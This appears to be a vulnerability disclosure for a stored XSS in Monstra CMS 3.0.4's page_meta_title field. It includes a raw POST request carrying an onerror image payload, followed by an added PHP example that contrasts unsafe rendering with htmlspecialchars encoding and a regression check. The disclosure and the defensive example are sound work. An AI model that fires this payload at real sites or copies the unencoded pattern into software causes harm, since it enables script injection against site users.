
Stored XSS in Monstra CMS 3.0.4 #458

@PrincyEdward

Monstra - Version 3.0.4

Exploit URI:
http://localhost/path/admin/index.php?id=pages&action=add_page
http://localhost/path/admin/index.php?id=pages&action=edit_page&name=

Parameter -> page_meta_title

POC:

POST /path/admin/index.php?id=pages&action=edit_page&name=aaaa HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/path/admin/index.php?id=pages&action=edit_page&name=aaaa
Content-Type: application/x-www-form-urlencoded
Content-Length: 460
Cookie: admin_username=admin; PHPSESSID=68m15vretbrdhhfa2ac19nqe17;
Connection: close
Upgrade-Insecure-Requests: 1

csrf=8a49185957df40c6b8bb8b3595663dedc3ffcb19&page_old_name=aaaa&old_parent=home&page_id=5&page_title=sample&page_name=sample&page_meta_title=prince%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&page_keywords=&page_description=&pages=home&templates=index&status=published&access=public&editor=&page_tags=&edit_page_and_exit=Save+and+Exit&page_date=2018-09-12+16%3A34%3A54
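A defensive illustration of the report above, added here and not taken from Monstra's code base or from the reporter: it decodes the `page_meta_title` field from the POC body, renders it unencoded and then encoded for attribute context, and uses a DOM parse as a regression check. The function names and the assumption that the stored value is written into a double-quoted HTML attribute are hypothetical; the page does not show the template.

```php
<?php
// Added example, not Monstra code. Function names are hypothetical.

// Constructed sample: the page_meta_title field from the POC body, still URL-encoded.
$body = 'page_meta_title=prince%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E';
parse_str($body, $form);
$metaTitle = $form['page_meta_title'];

// Vulnerable pattern (assumed): stored value concatenated into an attribute as-is,
// so the leading quote and angle bracket close the attribute and the tag.
function render_meta_unsafe(string $title): string
{
    return '<input type="text" name="page_meta_title" value="' . $title . '">';
}

// Hardened pattern: encode for HTML attribute context at output time.
// ENT_QUOTES covers both quote styles; ENT_SUBSTITUTE replaces invalid UTF-8
// instead of returning an empty string.
function render_meta_safe(string $title): string
{
    $encoded = htmlspecialchars($title, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    return '<input type="text" name="page_meta_title" value="' . $encoded . '">';
}

// Regression check: parse the fragment and count elements that the stored
// value should never be able to create.
function injected_elements(string $html): int
{
    libxml_use_internal_errors(true); // tolerate fragment-level parse warnings
    $doc = new DOMDocument();
    $doc->loadHTML('<!DOCTYPE html><html><body>' . $html . '</body></html>');
    libxml_clear_errors();
    return $doc->getElementsByTagName('img')->length
         + $doc->getElementsByTagName('script')->length;
}

foreach (['unsafe' => 'render_meta_unsafe', 'safe' => 'render_meta_safe'] as $label => $fn) {
    $html = $fn($metaTitle);
    printf("%-6s injected elements: %d\n       %s\n", $label, injected_elements($html), $html);
}
```

The same output-time encoding applies to every template that echoes the stored title, including the public page head and the admin edit form.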
